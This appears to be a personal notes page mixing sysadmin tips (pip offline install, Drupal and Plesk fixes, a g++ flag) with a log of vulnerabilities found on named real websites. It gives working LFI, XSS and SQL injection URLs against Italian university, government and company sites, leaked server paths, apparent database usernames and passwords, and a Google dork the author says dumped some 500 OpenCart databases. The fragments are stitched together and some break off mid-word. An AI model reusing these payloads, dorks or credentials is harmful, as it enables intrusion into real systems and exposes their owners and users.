pro(re)gress

How to compile with g++ without all the stack trace to avoid displaying all the long notes. add the parameter -Wfatal-errors  example: gcc -Wfatal-errors app.cpp -o app

  Local file inclusion  http://people.ding.unisannio.it/villano/villano/bibtexbrowser.php?frameset&bib=bibtexbrowser.php http://people.ding.unisannio.it/villano/villano/bibtexbrowser.php?bib=[filename%00] archived: https://archive.ph/wip/bUcUv   XSS http://people.ding.unisannio.it/villano/villano/bibtexbrowser.php?frameset&bib=%3Cimg%20src=/%20onerror=%22alert(1)%22%3E  Archived: https://archive.md/wip/WJf5b  (Guagliunastri. ... a fragol', a limon'! - Un grande il prof. Villano) -----  http://old.ing.unisannio.it/ects/scheda_en.php?1565 we can specify a column with the parameters http://old.ing.unisannio.it/ects/scheda_en.php?studenti archived: https://archive.ph/wip/zKWmP There is a need to bypass the url encoding and we cannot use spaces. --- %'% http://old.ing.unisannio.it/cerca_persone/index.php ---

Compiled from the most up-to-date source code of the app available at https://github.com/hyc/fcrackzip You can use it to easily crack/bruteforce the password for your zip file or to achieve a challenge like on root-me. Download fcrackzip for Windows

 Download pip 20.3.4 (latest for 2.x) https://pypi.org/simple/pip/  Decompress the file and then run python setup.py install ----   Download certifi, preferring the whl version that doesn't give a lot of problems You can choose the latest (as long as it works) and then run the following command (the filename depends on what you downloaded): pip install certifi-2021.10.8-py2.py3-none-any.whl https://pypi.org/simple/certifi/   Download certifi, preferring the whl version that doesn't give a lot of problems You can choose the latest (as long as it works) and then run the following command (the filename depends on what you downloaded): pip install setuptools-44.1.1-py2.py3-none-any.whl https://pypi.org/project/setuptools/44.1.1/#files Download certifi, preferring the whl version that doesn't give a lot of problems You can choose the latest (as long as it works) and then run the following command (the filename depends on what you downloaded): pip install urllib3-1.26.7-py2.py3-n

How to Install pip on Python 2.7 Offline without get-pip.py If you're using Python 2.7 and need to install pip offline without using get-pip.py, follow these steps: Step 1: Download the pip Package Download the pip package from the official GitHub repository at https://github.com/pypa/pip/tree/20.3.4 . The version 20.3.4 is the latest version that works with Python 2.7.x. Note: You can download the package on any device with internet access and transfer it to the target machine via USB drive, network share, or any other preferred method. Step 2: Extract the Package Once the package has been downloaded, extract it to a folder on the target machine. Note: You can extract the package using any standard archive utility software such as WinZip, WinRAR, 7-Zip, or any other similar tool. Step 3: Install pip After the package has been extracted, open a command prompt or terminal and navigate to the folder containing the extracted files. Run the following command: pyth

 any simple sql injection is useful to login and gain access to the web interface as administrator.

  Data Leak /var/www/vhosts/gruppomegawatt.it/elettrocampania.it/ /var/www/vhosts/gruppomegawatt.it/gruppomegawatt.it/ /var/www/vhosts/gruppomegawatt.it/electraweb.it/ ... Sample Page with errors https://archive.md/wip/VcwVh Sql injections are possible. http://clienti.gruppomegawatt.it/loginnew.asp?id=1 http://clienti.gruppomegawatt.it/loginnew.asp?id=2 http://clienti.gruppomegawatt.it/loginnew.asp?id=3 http://clienti.gruppomegawatt.it/loginnew.asp?id=4 http://areadipendenti.gruppomegawatt.it/loginnew.asp?id=1 http://areadipendenti.gruppomegawatt.it/loginnew.asp?id=2 http://areadipendenti.gruppomegawatt.it/loginnew.asp?id=3 http://areadipendenti.gruppomegawatt.it/loginnew.asp?id=4  

Drupal 7 (7.54) Error  this is a workaroud.  "Fatal error: Class entry requested for an object without PHP class" errors.inc on line 59 How to fix: edit /includes/errors.inc     replace         $caller = _drupal_get_last_caller(debug_backtrace());     with         $debugbtrace = debug_backtrace();         $caller = _drupal_get_last_caller($debugbtrace);

        Sample sql error. http://archiviodistatobenevento.beniculturali.it/index.php?it/246/indice-per-piazza&paginate_pageNum=%272 archived: https://archive.md/wip/7xpxt GLIZY framework E_ERROR : notaipiazze.models.notaipiazze: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-15, 15' at line 1 SELECT * FROM NotaiPiazze WHERE (1=1) ORDER BY Piazza ASC   XSS https://san.beniculturali.it/web/san/documenti-online sample xss <svg/onload=alert('XSS')>

  storemadeinitaly.it litaliano.org /var/www/vhosts/drintel.it/storemadeinitaly.it/ DB  st0_us3r_ St0R_M1t storemadeinital

      cult of the deadcow   db user: deadcow password  local user: deadcow web path: /home/deadcow/public_html/

 https://www.zerotheme.com/download/eco.php?eco="><script>alert('xss');</script><"&t=zMaxcart&ver=302x   https://archive.is/wip/ff85V  

http://www.regione.campania.it/normativa/item.php?25a99636d340201ca19723d96c08cf6e=c8be8114d02b6e6ccd84fb45ec1d2bb7&pgCode=G19I231R89&id_doc_type=122222&id_tema='&refresh=on   id_doc_type id_tema (sample error) https://archive.is/k1q6I   XSS in the same parameters http://www.regione.campania.it/normativa/item.php?25a99636d340201ca19723d96c08cf6e=c8be8114d02b6e6ccd84fb45ec1d2bb7&pgCode=G19I231R89&id_doc_type=122222&id_tema=%22%3E%3Cscript%3Ealert(1);%3C/script%3E&refresh=%27on  https://archive.is/jeP9G

Errors - mod_fcgid: read data timeout in 45 seconds and Premature end of script headers: index.php - 500 internal server error on Plesk: mod_fcgid: read data timeout   -In Plesk- domains >> example.com >> Apache & Nginx settings (Impostazioni Apache & nginx) In "Additional directives for HTTPS" (Direttive aggiuntive per HTTPS) Add: <IfModule mod_fcgid.c>     FcgidIOTimeout 300 </IfModule>     ----------------------------- Nginx Directives ( Direttive Nginx aggiuntive) proxy_connect_timeout 300s; proxy_send_timeout 300s; proxy_read_timeout 300s; fastcgi_send_timeout 300s; fastcgi_read_timeout 300s;

        video { object - fit : inherit ; }  

 The string should be composed of two parts separated by a dash/minus: 1) an md5 string 2) a variable string with the "data center" subdomain name.  This function checks if the api key is (somewhat) correct.     private function isApiKeyValid($api_key){         return !empty( preg_match('#^[a-z0-9]{32}-[a-z0-9]{3,}$#i', $api_key) );     }

Opencart have a serious leak of database informations when there's a database connection error. The fix/workaround can be downloaded here Is it a problem? With a simple script I got ~800.000 results and I've been able to scrap more than ~30.000 (in hours due to google limitations) and dumped more than 500 complete databases (those without restrictions from remote connections). From accessing the db several things can be done, even writing files, replacing informations (ex. malicious scripts, the paypal account, etc), getting more rights, etc. I just proved that it can be done and nothing else.  ----------------------------   You can add the domain TLD to have more results from google. I even found some important websites.   something like that https://www.google.com/search?q=system\library\db.php(31):+DB\MySQLi->__construct( I took the first results from my search (and replaced the passwords): berardomacchine.com '89.46.111.189', 'Sql1428497', '####'